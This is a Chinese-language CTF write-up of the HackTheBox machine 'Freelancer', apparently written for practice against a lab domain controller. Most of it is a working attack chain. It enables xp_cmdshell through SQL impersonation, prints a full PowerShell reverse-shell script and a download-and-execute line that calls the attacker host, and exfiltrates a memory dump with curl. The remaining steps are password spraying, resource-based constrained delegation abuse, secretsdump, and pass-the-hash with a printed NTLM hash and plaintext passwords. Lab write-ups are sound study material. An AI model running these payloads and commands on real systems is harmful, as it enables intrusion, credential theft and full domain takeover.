靶机ip：10.10.11.5

知识点

MSSQL通过xp_cmdshell 实现RCE
密码喷洒
滥用GenericWrite
RBCD约束委派
PTH传递攻击

信息收集

nmap扫描

1	nmap --min-rate 10000 -A -sV -sC -p- 10.10.11.5

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-30 19:20 CST
Warning: 10.10.11.5 giving up on port because retransmission cap hit (10).
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.11.5, 16) => Operation not permitted
Offending packet: TCP 10.10.16.4:35511 > 10.10.11.5:8189 S ttl=44 id=31021 iplen=44  seq=2972970908 win=1024 <mss 1460>
Nmap scan report for 10.10.11.5
Host is up (0.83s latency).
Not shown: 59837 closed tcp ports (reset), 5672 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          nginx 1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
|_http-server-header: nginx/1.25.5
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-30 16:21:28Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49683/tcp open  msrpc         Microsoft Windows RPC
49704/tcp open  msrpc         Microsoft Windows RPC
55297/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
|   10.10.11.5\SQLEXPRESS:
|     Instance name: SQLEXPRESS
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|     TCP port: 55297
|     Named pipe: \\10.10.11.5\pipe\MSSQL$SQLEXPRESS\sql\query
|_    Clustered: false
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-10-30T16:19:02
|_Not valid after:  2054-10-30T16:19:02
| ms-sql-ntlm-info:
|   10.10.11.5\SQLEXPRESS:
|     Target_Name: FREELANCER
|     NetBIOS_Domain_Name: FREELANCER
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: freelancer.htb
|     DNS_Computer_Name: DC.freelancer.htb
|     DNS_Tree_Name: freelancer.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2024-10-30T16:23:30+00:00; +5h00m04s from scanner time.
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|Vista|10|2012|Longhorn|7|8.1|2016|11 (94%)
OS CPE: cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7:::ultimate cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_8
Aggressive OS guesses: Microsoft Windows Server 2019 (94%), Microsoft Windows Vista SP1 (92%), Microsoft Windows 10 1709 - 1909 (91%), Microsoft Windows Server 2012 (91%), Microsoft Windows 10 2004 (90%), Microsoft Windows Longhorn (90%), Microsoft Windows Server 2012 R2 Update 1 (90%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows Server 2012 or Server 2012 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-10-30T16:23:12
|_  start_date: N/A
|_clock-skew: mean: 5h00m03s, deviation: 0s, median: 5h00m03s

TRACEROUTE (using port 1720/tcp)
HOP RTT       ADDRESS
1   689.59 ms 10.10.16.1
2   366.60 ms 10.10.11.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 196.91 seconds

开放若干端口，可以看到这是一台域控，根据80端口的结果，可以发现域名freelancer.htb，将其添加到/etc/hosts中，同时存在SQL Server

SMB

1	smbclient -L //10.10.11.5

smb没有重要信息

80端口

扫描一下目录

1	gobuster dir -u http://freelancer.htb/ -w /usr/share/wordlists/dirb/common.txt -t 5

访问后还是没什么重要信息

随便点了篇文章发现url的数据像是用户的编号

测试后发现id为2的时候是admin用户

注册个自由账户登录后发现路由跳转到/job/search/

发现还是没有登陆进去

在注册个员工账户

发现没激活不让登录，注意到两个账户登陆的表单是同一个，还有个忘记密码，尝试一下

通过忘记密码功能成功以员工身份登录到后台

获得网站admin权限

注意到有个QRcode，扫描一下

有一个url，访问url会跳转到当前用户

注意到中间可能是base64编码

解码后发现是10012

之前知道 admin 的 id 是2，感觉可以尝试伪造一下

ps: 注意每个QRcode生成的链接有时效性，需要在生成QRcode后就替换并访问（这里我试了好多次）

获取到网站的admin权限

MSSQL通过RCE获得shell

当前页面并没有什么新的东西，之前目录扫描知道有admin路由，访问一下

注意到右下角有个SQL Terminal

简单执行select @@version;发现可以执行sql语句

尝试利用sql的执行命令

利用SQL枚举，尝试xp_cmdshell

Pentesting MSSQL

1	SELECT SYSTEM_USER;

1	SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';

1	EXECUTE AS LOGIN = 'sa';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

1	EXECUTE AS LOGIN = 'sa';EXEC xp_cmdshell whoami;

接着执行命令获取shell，但是测试后发现有杀软

准备一个ps1脚本（找了好久才找到，大多数都被杀了，人都麻了）

#shell.ps1
do {
    # Delay before establishing network connection, and between retries
    Start-Sleep -Seconds 1

    # Connect to C2
    try{
        $TCPClient = New-Object Net.Sockets.TCPClient('10.10.16.4',8888)
    } catch {}
} until ($TCPClient.Connected)

$NetworkStream = $TCPClient.GetStream()
$StreamWriter = New-Object IO.StreamWriter($NetworkStream)

# Writes a string to C2
function WriteToStream ($String) {
    # Create buffer to be used for next network stream read. Size is determined by the TCP client recieve buffer (65536 by default)
    [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}

    # Write to C2
    $StreamWriter.Write($String + 'SHELL> ')
    $StreamWriter.Flush()
}

# Initial output to C2. The function also creates the inital empty byte array buffer used below.
WriteToStream ''

# Loop that breaks if NetworkStream.Read throws an exception - will happen if connection is closed.
while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {
    # Encode command, remove last byte/newline
    $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1)
    
    # Execute command and save output (including errors thrown)
    $Output = try {
            Invoke-Expression $Command 2>&1 | Out-String
        } catch {
            $_ | Out-String
        }

    # Write output to C2
    WriteToStream ($Output)
}
# Closes the StreamWriter and the underlying TCPClient
$StreamWriter.Close()

启动监听

1 2	EXECUTE AS LOGIN = 'sa'; EXECUTE xp_cmdshell 'powershell -c iex(iwr -usebasicparsing http://10.10.16.4/shell.ps1)';

成功获得shell

sql_svc->mikasaAckerman

先简单查看一下

在C:\users\sql_svc\downloads\SQLEXPR-2019_x64_ENU目录下的sql-Configuration.INI文件中找到俩密码IL0v3ErenY3ager和t3mp0r@ryS@PWD

将C:\Users中的用户名保存到users文件中，密码保存至passwd文件中，尝试密码喷洒

1	crackmapexec smb freelancer.htb -u users -p passwd

找到一组正确的凭据mikasaAckerman:IL0v3ErenY3ager

但是winrm并没有成功的凭据

使用RunasCs进行横向，先上传至靶机

1	curl 10.10.16.4/RunasCs.exe -outfile RunasCs.exe

靶机执行

1	.\RunasCs.exe mikasaAckerman "IL0v3ErenY3ager" -d freelancer.htb cmd -r 10.10.16.4:8889

成功获得mikasaackerman用户权限

在Desktop找到user.txt

mikasaAckerman->lorra199

在mikasaAckerman桌面还有两个文件，其中一个是压缩包

先看下mail.txt

通过smb文件共享来传输文件，这里使用httpuploadexfil工具实现

先在攻击机建立监听

1	./httpuploadexfil :9999 /root/HackTheBox/Freelancer/share

靶机执行

1	curl -F "file=@MEMORY.7z" http://10.10.16.4:9999/p

解压后发现是个 DMP文件

使用MemProcFS进行分析

1	./memprocfs -device /root/HackTheBox/Freelancer/share/MEMORY.DMP -mount /root/HackTheBox/Freelancer/dmp_mnt

将其挂载到一个空目录，在切换终端查看该目录

发现在registry/hive_files目录下找到SAM、SYSTEM和SECURITY文件

使用secretsdump导出hash值

1	secretsdump.py -sam 0xffffd3067d935000-SAM-MACHINE_SAM.reghive -security 0xffffd3067d7f0000-SECURITY-MACHINE_SECURITY.reghive -system 0xffffd30679c46000-SYSTEM-MACHINE_SYSTEM.reghive local

发现在最下面有一串明文密码PWN3D#l0rr@Armessa199

继续尝试密码喷洒

找到一组凭据lorra199:PWN3D#l0rr@Armessa199

winrm发现也可以使用，直接使用evil-winrm登录

成功登录lorra199用户

权限提升

bloodhound信息收集

先使用bloodhound-python信息搜集

1	bloodhound-python -ns 10.10.11.5 --dns-tcp -d freelancer.htb -u lorra199 -p PWN3D#l0rr@Armessa199 -c All --zip

发现lorra199用户属于AD RECYCLE BIN组

同时还注意到AD RECYCLE BIN组对DC有GenericWrite权限，可以修改该账户的属性，包括设置或更改允许委派到的服务列表，这可以间接实现约束委派（RBCD）

RBCD

在计算机对象上滥用 GenericWrite 的一种方法是在域上创建一台假计算机，然后写入 DC，该假计算机能够作为 DC 进行委派（使用基于资源的约束委派（RBCD））。然后，我可以作为 DC 请求票证并充当 DC。

添加计算机

1	addcomputer.py -computer-name 'Ya$' -computer-pass 'Aa123456!' -dc-host freelancer.htb -domain-netbios freelancer.htb freelancer.htb/lorra199:'PWN3D#l0rr@Armessa199'

使用RBCD，如果这台 PC 属于“域管理员”组，我们将授予它冒充为用户“管理员”的权限

1	rbcd.py -delegate-from 'Ya$' -delegate-to 'DC$' -dc-ip 10.10.11.5 -action 'write' 'freelancer.htb/lorra199:PWN3D#l0rr@Armessa199'

使用getST获取服务票证以访问服务CIFS

在请求票据之前，先与服务器时间同步

1	ntpdate -s freelancer.htb

再请求票据

1	getST.py -spn 'cifs/dc.freelancer.htb' -dc-ip 10.10.11.5 -impersonate 'administrator' 'freelancer.htb/Ya:Aa123456!'

导入票据，然后使用secretdump获取hash值

1	export KRB5CCNAME=administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache

1	secretsdump.py 'freelancer.htb/Administrator@DC.freelancer.htb' -k -no-pass -dc-ip 10.10.11.5 -target-ip 10.10.11.5 -just-dc-ntl

最后evil-winrm登录

1	evil-winrm -i freelancer.htb -u administrator -H '0039318f1e8274633445bce32ad1a290'

在Desktop找到root.txt